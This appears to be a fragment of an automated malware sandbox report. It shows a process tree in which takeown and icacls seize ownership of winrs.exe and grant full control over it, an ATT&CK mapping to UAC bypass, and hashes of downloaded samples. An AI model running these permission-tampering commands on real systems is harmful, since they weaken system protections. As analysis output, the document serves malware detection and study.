C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1864
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S DSEYXUOD /U Admin /F "C:\Windows\System32\winrs.exe"2⤵
- Modifies file permissions
PID:4280 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4592
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\winrs.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1544
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Event Triggered Execution (1)
  - Change Default File Association (1)
Downloads
- Filesize: 514KB
  MD5: 3420edfa91a09a10622832a351968311
  SHA1: 13465122028fd67b708444bc895db4a272b3609d
  SHA256: debe43a0afa037775a0f5c3cc74e744ba5ec3e82475a0ffd61179592b16e9a34
  SHA512: 1f9b0897ed453b0e19559bb7ba0b254f7f5c244f834c13750b76e141bb69e3df993eb916b29190ef9c51a44c20bd6208dbdca02bc616ed0c4250b79f84bf9491
- Filesize: 514KB
  MD5: 727be99ff9eeeaa5cd1071ee45b7f887
  SHA1: 5b25c9316477555628808fd81617e1edff3f9cc9
  SHA256: 05fe7f3ad7719dbc4545a8883395e3851ed506a8c7d246e9d6963ec53bf157e8
  SHA512: 444e89b4eff1722b464a9e09529e905169a2624f7f8844a202e45324e947eb508c849bb51592c7c32fe6b94729e509c4360c2acc465cd5bbb1ace880bd9f0e7c